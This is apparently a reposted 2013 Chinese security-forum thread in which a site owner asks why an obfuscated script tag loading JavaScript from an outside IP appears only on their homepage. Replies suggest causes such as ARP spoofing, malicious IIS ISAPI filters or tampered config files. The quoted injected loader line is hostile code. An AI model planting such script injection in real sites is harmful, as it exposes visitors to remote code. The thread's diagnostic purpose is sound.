T00ls有人问

主页总有 

<script type="text/javascript">document.write(unescape('%3Cscript type="text/javascript" src="http://115.238.147.102/A0EED19F1C1CB08BDED1D52D5DA33474?id=2&t=457515&m=0226ec1ad7a6b93b"%3E%3C/script%3E'))</script>

我看了我的主页。任何地方都没有找到这一句话。。。。只有主页有这。。。

问题来了,求大牛解答。。。。

1.为什么只有主页有这。我把同样的主页文件改名。没有这JS出来。。。我就怀疑是不是在服务器上动了手脚。

2.在服务器上动了手脚。那会是在哪了?

求科普。。。。

@核攻击

老鬼 发表于 2013-3-11 21:22

IP:115.238.147.102,归属地:浙江省宁波市/杭州市 电信,ISP:CHINANET Zhejiang province network

想分析一下这个文件呢,这个地址已经404了。

谷歌搜了一下 http://115.238.147.102,发现大量网站都存在该代码,并且不分国际、语言,有韩国的站,时间大部分集中在2013年2月22-26日,集中在留言板之类的地方,用途不明。

非本服务器问题:

1、检查局域网arp

2、检查电信骨干网广告

3、其他网络设备

本服务器问题:

1、检查IIS是否有可疑ISAPI过滤器,可疑页脚文件

2、检查网站源码是否存在 glabol.asa glabol.aspx

3、检查全局调用脚本(conn.asp config.php 等)是否存在可疑代码。

4、其他脚本文件。

我觉得应该是有人大规模放置这些脚本,原因不明。

2013-3-19 8:49:26 事件后续补充:

是不是 .htaccess?其它目录中有没有看着陌生的一个js和一个大概20多字节的txt

skyfly 发表于 2013-3-12 09:46

--------------------------------------------------------------------------------

回复  老鬼

1、修改一下DNS试试(将DNS修改为8.8.8.8)

2、修改首页,你首页如果是index.html 那么你直接 ...

小A 发表于 2013-3-12 11:03

--------------------------------------------------------------------------------

回复 12# 核攻击

核老大说的是, 我就怀疑是不是ISAPI。看不懂这。没有办法。

2.中说的没有。已经早看了。

3.中说的没有。已经早看了

4.都没有找到?

真是ARP ???

老鬼 发表于 2013-3-12 17:57

--------------------------------------------------------------------------------

iis   一般  免费空间商 都会这样

iis设置里面  %windir%\system32\inetsrv\MetaBase.xml  看看这个吧

paco 发表于 2013-3-12 19:33

--------------------------------------------------------------------------------

检查一下iis

牧童 发表于 2013-3-13 02:50

--------------------------------------------------------------------------------

一看就是isapi 或者插件搞得鬼 嘿嘿

perky 发表于 2013-3-13 04:48

--------------------------------------------------------------------------------

以前碰到过,很有可能是机房ARP

frozenrain 发表于 2013-3-13 09:16

--------------------------------------------------------------------------------

以前遇到过最大可能是isapi,以前的是所有页面,楼主的这个是只有主页!

另外如果ARP的话,访问其它页面也应该 ...

tianci2007 发表于 2013-3-16 18:40

--------------------------------------------------------------------------------

回复  tianci2007

isapi可以过滤的,可以只插首页,每个IP只插一次,只插指定关键词的页面等……

arp同样也可以做到……

(以上两种我不久前写过)

核攻击 发表于 2013-3-19 08:43

留言评论(旧系统):

nnn00000 @ 2013-03-16 11:08:31

IIS设置打开后,找到网站的某个JS重定向。。哎呀。太坏了。

本站回复:

╮(╯_╰)╭